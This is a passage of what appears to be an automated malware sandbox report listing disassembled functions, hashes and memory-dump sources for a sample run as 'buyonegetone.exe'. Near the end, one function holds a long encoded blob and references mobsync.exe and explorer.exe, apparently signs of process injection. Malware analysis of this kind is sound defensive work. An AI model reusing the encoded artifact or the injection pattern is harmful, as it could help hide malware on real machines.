
                                                                                                                                                                      Function 00007FF68605B664, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                      • API String ID: 3215553584-3030954782
                                                                                                                                                                      • Opcode ID: 6ebbaa11577a126fcb93d37c1cc9508636a3734f2554967394091e3ebbb75e30
                                                                                                                                                                      • Instruction ID: 7f123e44d7a0af49aa93b2ffc1cb0e574f3f73186b11267dbfa0557de3798084
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ebbaa11577a126fcb93d37c1cc9508636a3734f2554967394091e3ebbb75e30
                                                                                                                                                                      • Instruction Fuzzy Hash: FC512862B187C6C6E7218F3996543696B92FF40B90F089239C79CD7AD5CF2EE844C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604EA74, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2558813199-1018135373
                                                                                                                                                                      • Opcode ID: 939ed8649b69eab68203578a43ec588be4449609f0fd757e2dca87993d1536af
                                                                                                                                                                      • Instruction ID: 74026f99f054b74e11e5cf499c55f0c1c2c2e344537ff38e5777607fff57f413
                                                                                                                                                                      • Opcode Fuzzy Hash: 939ed8649b69eab68203578a43ec588be4449609f0fd757e2dca87993d1536af
                                                                                                                                                                      • Instruction Fuzzy Hash: F9516F32618782C6D630EB25E64026E77A4FB99B94F100138DB8D87B55CF7DE8A1CB05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686063258, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                      • Opcode ID: 232f910ff0808134edd1f32a4b488a3ae1fb9451d37860e42ff9a1fba1430121
                                                                                                                                                                      • Instruction ID: 2119d1d0a7c83e9cda56508f6776bd92f4bc15db5ef305bc12b3eee715188a6d
                                                                                                                                                                      • Opcode Fuzzy Hash: 232f910ff0808134edd1f32a4b488a3ae1fb9451d37860e42ff9a1fba1430121
                                                                                                                                                                      • Instruction Fuzzy Hash: 3C41A232A18B51C5EB208F25E9443A967A0FB88794F505039EF4DC7798EF7DD941C744
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686065E04, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_errorf
                                                                                                                                                                      • String ID: "$powf
                                                                                                                                                                      • API String ID: 2315412904-603753351
                                                                                                                                                                      • Opcode ID: aab90d8fa0024c78f9f5f30e235444de17b336a26878e8c18280b7e4ef85d04e
                                                                                                                                                                      • Instruction ID: fd6706acbdf8c99c30235fab23c0d00da58b62c4df2fe236a5fc7ce38add7a58
                                                                                                                                                                      • Opcode Fuzzy Hash: aab90d8fa0024c78f9f5f30e235444de17b336a26878e8c18280b7e4ef85d04e
                                                                                                                                                                      • Instruction Fuzzy Hash: 27416373D28781DAD371CF22E0847A9B6A0FB99348F101329F78946994DF7EC990DB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686042D30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID: ios_base::failbit set
                                                                                                                                                                      • API String ID: 1109970293-3924258884
                                                                                                                                                                      • Opcode ID: a488108b85d08225bfa3b687b9050c41ae30d86a11950ce15bfff4045a624ae7
                                                                                                                                                                      • Instruction ID: bd25f246f8c91965c21f01e09de4fdf5bd01709e0b96a232f63cbc0585853a8b
                                                                                                                                                                      • Opcode Fuzzy Hash: a488108b85d08225bfa3b687b9050c41ae30d86a11950ce15bfff4045a624ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: 4131D322A08B85C1EB208B24E5413A96320FFA87A8F149335EBAC427D5EF7DD5D4C304
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686065CE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_error
                                                                                                                                                                      • String ID: "$pow
                                                                                                                                                                      • API String ID: 1757819995-713443511
                                                                                                                                                                      • Opcode ID: cd39ec047a0f984d166b0bf4616c01effc3e6dcc66f47e544497a243a356f652
                                                                                                                                                                      • Instruction ID: d998868153cf057ac9d40f5ee3bfe688b1e3750044b4ba2c0cc421dd46dc3294
                                                                                                                                                                      • Opcode Fuzzy Hash: cd39ec047a0f984d166b0bf4616c01effc3e6dcc66f47e544497a243a356f652
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F313D72D18B85C6E771CF10E04466AAAB0FFDA344F201329F78A46994DF7ED4819F04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605CA88, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_errno_from_matherr
                                                                                                                                                                      • String ID: exp
                                                                                                                                                                      • API String ID: 1187470696-113136155
                                                                                                                                                                      • Opcode ID: 38fead14972a1eec31403cf24fe4bb4e0cf0cf9b1638df4f6de8ca42ef05cc45
                                                                                                                                                                      • Instruction ID: 0fc0a1256e30edb555ebaf855776037efb7cdf185fe8787f4e4e28ab30456a7f
                                                                                                                                                                      • Opcode Fuzzy Hash: 38fead14972a1eec31403cf24fe4bb4e0cf0cf9b1638df4f6de8ca42ef05cc45
                                                                                                                                                                      • Instruction Fuzzy Hash: FF213E36A19685CBE760DF28A54126AB7A0FF98300F50513DF68DD2B45EE3DE800CF04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605EC8C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CompareStringtry_get_function
                                                                                                                                                                      • String ID: CompareStringEx
                                                                                                                                                                      • API String ID: 3328479835-2590796910
                                                                                                                                                                      • Opcode ID: 7151cf555841e62792745c7ee48492f6c8567249aac293e9bf01437dc0ad6030
                                                                                                                                                                      • Instruction ID: add3aa9f0edbe2d5c59d232667e96ea3a05331815dc64833e19c4876cbcbfebd
                                                                                                                                                                      • Opcode Fuzzy Hash: 7151cf555841e62792745c7ee48492f6c8567249aac293e9bf01437dc0ad6030
                                                                                                                                                                      • Instruction Fuzzy Hash: B4112936608BC1C6D7608B55B5406AAB7A0FBC8B90F14813AEECD93B19CF3DD854CB44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605F140, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Stringtry_get_function
                                                                                                                                                                      • String ID: LCMapStringEx
                                                                                                                                                                      • API String ID: 2588686239-3893581201
                                                                                                                                                                      • Opcode ID: 871af9d8ab282d3569e3073f6cd61f7e70fb74fcc2ea2c3338b270036ff96911
                                                                                                                                                                      • Instruction ID: 08409cd7c520e24a8c83eaf9dc1781531a55fc0801d45bff8885e2a3f5aef150
                                                                                                                                                                      • Opcode Fuzzy Hash: 871af9d8ab282d3569e3073f6cd61f7e70fb74fcc2ea2c3338b270036ff96911
                                                                                                                                                                      • Instruction Fuzzy Hash: 84110B36608BC1C6D764CB56F5402AAB7A4FB89B90F54413AEE8D93B59CF3DD840CB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6860428A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 1838369231-1405518554
                                                                                                                                                                      • Opcode ID: 8dfaff509c755597ec061ef6071315be3bb42e56ada5acf187447b46f720058e
                                                                                                                                                                      • Instruction ID: 0a6a360f92e055462c8627f13fdec2a5662602e9c52edc04bbc3cddcc6637b09
                                                                                                                                                                      • Opcode Fuzzy Hash: 8dfaff509c755597ec061ef6071315be3bb42e56ada5acf187447b46f720058e
                                                                                                                                                                      • Instruction Fuzzy Hash: 8701A222109B81C9C7A4DF74A98015C77B5FF28B88B185139CB8CC371AEF39C890C344
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604BB14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6860485BE), ref: 00007FF68604BB58
                                                                                                                                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6860485BE), ref: 00007FF68604BB9E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                      • Opcode ID: bea819e4984341876aae97c79fcd7bc68fbabd3abac3cc71b665084c62774502
                                                                                                                                                                      • Instruction ID: e9051edaa3e86799150072b9d245891526cdf63161c841e1c01b782c358642b0
                                                                                                                                                                      • Opcode Fuzzy Hash: bea819e4984341876aae97c79fcd7bc68fbabd3abac3cc71b665084c62774502
                                                                                                                                                                      • Instruction Fuzzy Hash: 09116A32608B81C2EB208F25E54026977A1FF88B88F584234EF8C87B68DF7DD851CB44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605EFB0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultUsertry_get_function
                                                                                                                                                                      • String ID: GetUserDefaultLocaleName
                                                                                                                                                                      • API String ID: 3217810228-151340334
                                                                                                                                                                      • Opcode ID: f36847d21b47396b6124b8caf12b7d888d3aeb93c0b5cdd0a56f9e98f48143d9
                                                                                                                                                                      • Instruction ID: 093f1f8b2f16fdea12d387707c30b3739181827ce50f549ceaff8430048ae390
                                                                                                                                                                      • Opcode Fuzzy Hash: f36847d21b47396b6124b8caf12b7d888d3aeb93c0b5cdd0a56f9e98f48143d9
                                                                                                                                                                      • Instruction Fuzzy Hash: 90F02710B0C243C1FB284B65B7952B91261BF487C0F84903EEA0DD3755DE2EEC84C348
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605F014, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F045
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF68605496C,?,?,?,?,?,?,?,?,00007FF686052177), ref: 00007FF68605F05F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                                                                                      • API String ID: 539475747-3084827643
                                                                                                                                                                      • Opcode ID: 2cbb35288a37513c5ba61f5b238e96a2c6ce937cdb013f21624f9d819ca3875d
                                                                                                                                                                      • Instruction ID: aae078258e5af3096f9653c1e719707621a8c07a48b48406ad2244ade6242d3d
                                                                                                                                                                      • Opcode Fuzzy Hash: 2cbb35288a37513c5ba61f5b238e96a2c6ce937cdb013f21624f9d819ca3875d
                                                                                                                                                                      • Instruction Fuzzy Hash: 16F0BE21B08781C2FA049B51B6000A92361BF48B80F48913AEA5D93B55CE3EEC84CB08
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605EED8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605EF01
                                                                                                                                                                      • TlsSetValue.KERNEL32(?,?,8000000000000000,00007FF68605AC42,?,?,8000000000000000,00007FF686056A2D,?,?,?,?,00007FF68605AE29), ref: 00007FF68605EF18
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                                                                      • String ID: FlsSetValue
                                                                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                                                                      • Opcode ID: 62cd9636d67e5ce5c82c1edbb01e06b21be09cd90d2af876ab34d084c39e020e
                                                                                                                                                                      • Instruction ID: e49996f0cca00da83c3c7cbbc186a88b00790503d943aa9179846048b66161af
                                                                                                                                                                      • Opcode Fuzzy Hash: 62cd9636d67e5ce5c82c1edbb01e06b21be09cd90d2af876ab34d084c39e020e
                                                                                                                                                                      • Instruction Fuzzy Hash: 76E09261A0C746D1FE084B64FA051B82232BF48780F88803EEA4D96395CE3FEC84C349
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Analysis Process: buyonegetone.exe PID: 7120 Parent PID: 3388 buyonegetone.exeCOMMON

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FF6FE115ED8, Relevance: 3.2, APIs: 2, Instructions: 207COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Wcsftime$_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4239037671-0
                                                                                                                                                                      • Opcode ID: b7cdc139778069345d05bc1a0203156a00a62fb54fc34efc2fb8fe5e1c560dcb
                                                                                                                                                                      • Instruction ID: 91f761fe59b34a07b3169087fc00b6ddb26b8aa10d7f68b649df058a46ec2cbd
                                                                                                                                                                      • Opcode Fuzzy Hash: b7cdc139778069345d05bc1a0203156a00a62fb54fc34efc2fb8fe5e1c560dcb
                                                                                                                                                                      • Instruction Fuzzy Hash: 31817072E04A5286EB60CEA6D48137D2B64FBE4B98F144636EE2E877D5EF3DD4418340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE107CB8, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 59578552-0
                                                                                                                                                                      • Opcode ID: 088d467cec947a303d1071b944324c29810d5aa90d0137deb7dd50eed9953ca4
                                                                                                                                                                      • Instruction ID: cc0305d158387963c21fae1729af9033facaa9a6397845e964804255764ac556
                                                                                                                                                                      • Opcode Fuzzy Hash: 088d467cec947a303d1071b944324c29810d5aa90d0137deb7dd50eed9953ca4
                                                                                                                                                                      • Instruction Fuzzy Hash: 5BE0BF20E5D14785EB29F7E7584217C18955FF5B20F50113AF23DC13C2ED2D25A29A22
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE103190, Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 341COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • FBtx+cQ0wBf1QaR/F3NyW2buPGRwuoe8XWPJF+s/XkGNNyrUqBweCIM5LbxzHXsAWbL2LktkJjnllVbj6BGrqrqYneuqzN3tjTEBSUZlWEfQHxmm0HfxZ4W7xd7Etp7tjxqdtXY+9v/AmBnr+JWYRqKSraPDrzg/TJgshMz+ZokplO4ccfvRwhMziznOglinvB1lUmTLGC79cHnwg2VgF+aqLvG92DRJirkU5ivdR4L9Y6Gu44KypBugLL1iski5Vtdj, xrefs: 00007FF6FE103240
                                                                                                                                                                      • @, xrefs: 00007FF6FE103096
                                                                                                                                                                      • C:\Windows\System32\mobsync.exe, xrefs: 00007FF6FE10303C
                                                                                                                                                                      • explorer.exe, xrefs: 00007FF6FE102F76
                                                                                                                                                                      • R]7, xrefs: 00007FF6FE1033CB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Window$Concurrency::cancel_current_taskConsoleMitigationPolicyProcessShow
                                                                                                                                                                      • String ID: @$C:\Windows\System32\mobsync.exe$FBtx+cQ0wBf1QaR/F3NyW2buPGRwuoe8XWPJF+s/XkGNNyrUqBweCIM5LbxzHXsAWbL2LktkJjnllVbj6BGrqrqYneuqzN3tjTEBSUZlWEfQHxmm0HfxZ4W7xd7Etp7tjxqdtXY+9v/AmBnr+JWYRqKSraPDrzg/TJgshMz+ZokplO4ccfvRwhMziznOglinvB1lUmTLGC79cHnwg2VgF+aqLvG92DRJirkU5ivdR4L9Y6Gu44KypBugLL1iski5Vtdj$R]7$explorer.exe
                                                                                                                                                                      • API String ID: 4262344479-4185684469
